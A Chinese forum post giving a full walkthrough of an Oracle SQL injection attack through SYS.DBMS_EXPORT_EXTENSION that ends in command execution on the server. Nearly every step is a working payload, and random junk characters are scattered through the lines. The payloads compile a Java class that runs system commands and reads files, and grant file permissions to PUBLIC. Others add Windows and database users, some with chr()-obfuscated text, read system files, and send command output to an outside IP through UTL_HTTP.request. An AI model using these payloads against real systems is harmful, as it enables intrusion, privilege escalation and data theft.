
实例演示oracle注入获取cmdshell的全过程

发表于 2012-12-18 12:21:48
以下的演示都是在 web 上的 SQL*Plus 中执行的;在 web 注入时,把 select SYS.DBMS_EXPORT_EXTENSION..... 改成
3 H+ y7 h3 c5 T. V) `
* \9 e; }+ P" M! j  L  /xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....)
" `& q) ]* t+ y# u的形式即可。(用" 'a'|| "是为了让语句返回true值) % I: p( ?3 _  t. e% u4 b
语句有点长,可能要用post提交。
以下是各个步骤:
1.创建包
" I" M! U& `- m) g( C, P通过注入 SYS.DBMS_EXPORT_EXTENSION 函数,在oracle上创建Java包LinxUtil,里面两个函数,runCMD用于执行系统命令,readFile用于读取文件:7 K/ P( j) R  y9 L5 F) d' i9 ^
/xxx.jsp?id=1 and '1'<>'a'||( + S4 J  g, C7 r: g  [0 m9 N+ v
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''5 J' i3 Z' E6 B8 z. ?/ z! W
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
, m4 Q  Y  V4 G; h4 j, unew InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}" a  m& l- I) X* v) H/ v
}'''';END;'';END;--','SYS',0,'1',0) from dual
: g6 a/ Q+ k9 M/ ~, {6 P) 7 v5 k+ {8 ]; R
------------------------
" c( l( X# \) W5 V" L如果url有长度限制,可以把readFile()函数块去掉,即:
  Z! W9 E4 O5 Q/ }) b/xxx.jsp?id=1 and '1'<>'a'||( $ L$ O+ P( C. P2 @" O' O
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
9 U& ~6 K2 V* n- ccreate or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(3 a/ U4 `6 p/ _1 Q" B- r1 T
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
4 s  u; [' c. t}'''';END;'';END;--','SYS',0,'1',0) from dual
9 r8 `) ]% h) L) @) * S/ X2 g# w0 W* I
同时把后面步骤 提到的 对readFile()的处理语句去掉。
------------------------------
2.赋Java权限
& o! s8 G' r! fselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual7 ]6 |) |/ O# j8 N5 [5 K% ^. m8 [
3.创建函数
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
# Y  m; L, A4 T7 Zcreate or replace function LinxRunCMD(p_cmd in varchar2)  return varchar2  as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual% z# i  B2 X2 G5 Z1 \
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
, f* y+ Y- S5 a* Y  pcreate or replace function LinxReadFile(filename in varchar2)  return varchar2  as language java name ''''''''LinxUtil.readFile(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual9 L* \+ h9 W! o2 G
4.赋public执行函数的权限
# ^1 ]" L5 _2 Z3 V+ R# Qselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual
! y5 [. }/ T2 b$ ]* E, Y. u/ _select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual
* R" `8 i# }: I5 G5.测试上面的几步是否成功
* l) k) ~% X4 ~& t5 w/ L4 Hand '1'<>'11'||( 2 E- z* g) H2 [4 C" W" |
select  OBJECT_ID from all_objects where  object_name ='LINXRUNCMD' 9 o7 G, O. D9 T/ ^1 z6 o  O
)
* W: y3 y' X2 V$ V1 rand '1'<>(
1 Q* x, C6 S. s. @! Yselect  OBJECT_ID from all_objects where  object_name ='LINXREADFILE' $ J5 l" D6 z4 W
) - Q2 X# z# e7 i, F9 y
6.执行命令:
3 j) a# r: [! b" `2 q% s8 U/xxx.jsp?id=1 and '1'<>(
& l- v5 h1 |% A: {select  sys.LinxRunCMD('cmd /c net user linx /add') from dual
. @$ d' S( G0 s+ L+ |3 Y
' ~9 P7 [* |, n5 R! v- A+ N) . M# J0 \; O! Y- B+ f
/xxx.jsp?id=1 and '1'<>( , {3 v7 |& j1 ?3 w
select  sys.LinxReadFile('c:/boot.ini') from dual$ o1 M/ f* b% b# f

2 q3 h; r% \9 z* h5 q)7 n& u4 u: I7 i- R+ w/ n& h/ X
  
注意sys.LinxReadFile()返回的是varchar类型,不能用 "and 1<>" 代替 "and '1'<>"。
如果要查看运行结果可以用 union:
/xxx.jsp?id=1 union select  sys.LinxRunCMD('cmd /c net user linx /add') from dual* w  F9 x" _+ G5 `; I# [
或者 UTL_HTTP.request():
! }  V* F( r  L/xxx.jsp?id=1 and '1'<>( ( S. N; N2 T" ]6 O& e
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),'\n','%0A')) FROM dual
5 w- O: d9 U+ `$ G" Q1 P)
0 j7 p$ v4 B" Z% a" Y/ J1 M' c3 S/xxx.jsp?id=1 and '1'<>( # X6 i( L! t" u3 }3 q* `. i
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),'\n','%0A')) FROM dual
( o5 j& m5 X* P. n5 k, W)
注意:用UTL_HTTP.request时,要用 REPLACE() 把空格、换行符替换掉,否则无法提交http request。用utl_encode.base64_encode也可以。
--------------------
6.内部变化
通过以下命令可以查看all_objects表的改变(管理员同样可以用这个查询检查实例里是否残留了来路不明的 Java 源和函数):
2 z+ k+ b' E5 Wselect  * from all_objects where  object_name like '%LINX%' or  object_name like '%Linx%', S) I) Y. `* E- {
7.删除我们创建的函数
- V$ I5 d' m4 m4 a) |% d8 Q9 j. w6 T' |select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
. O# Q# S1 c# _/ n& t. u7 x; _drop function LinxRunCMD  '''';END;'';END;--','SYS',0,'1',0) from dual
====================================================
全文结束。谨以此文赠与我的朋友。
linx
124829445
2008.1.12
[email protected]
======================================================================
测试漏洞的另一方法:
创建oracle帐号:
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
% k4 I: y/ \" g1 H/ b5 m6 FCREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
即:
) o" T% R' O- d8 [select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),
0 k; X5 J9 L. Schr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual + Z' T4 I- L0 w$ H5 `. b3 A
确定漏洞存在:
& x4 _3 B" I% W* [: i1<>( 5 d/ X# B9 c( y1 Z
select user_id from all_users where username='LINXSQL'
6 Y) d! Y4 Y* T1 l5 ]; ])
" O+ @) N) w; u9 L4 B, F1 S给linxsql连接权限:
  q) R  ~  l! G; S$ Z& N$ J" ~9 {select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''3 G) ~. b: e. ?4 w/ p, c+ U# ~
GRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
删除帐号:
$ G7 S0 A, J1 l. A! I5 rselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
' `, K6 s4 u4 \1 U1 k2 D" Kdrop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual ( _, i9 V/ f0 l. R; f0 S" y; `2 j
======================
以下方法创建一个可以执行多语句的函数Linx_query(),执行成功的话返回数值"1",但权限是继承的,可能仅仅是public权限,作用似乎不大,真的要用的话可以考虑grant dba to 当前的User:
7 c/ K, @3 i/ i5 Y; C1.jsp?id=1 and '1'<>(   k$ s( H1 E. o
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
0 H+ E3 q/ n1 D# w: Ucreate or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1;  end;   '''';END;'';END;--','SYS',0,'1',0) from dual# M  f0 [* T$ x7 j) D0 |2 _1 n: f
) and ... 1.jsp?id=1 and '1'( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE" o. E7 B0 L* {2 P
 )
: q5 ]" e5 e+ h* P4 C* o  u# w) M
% T" o' n5 V" u( S) G$ \( j* g: f
2 F, M0 ~/ a: ?) o9 j4 D! {6 l
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表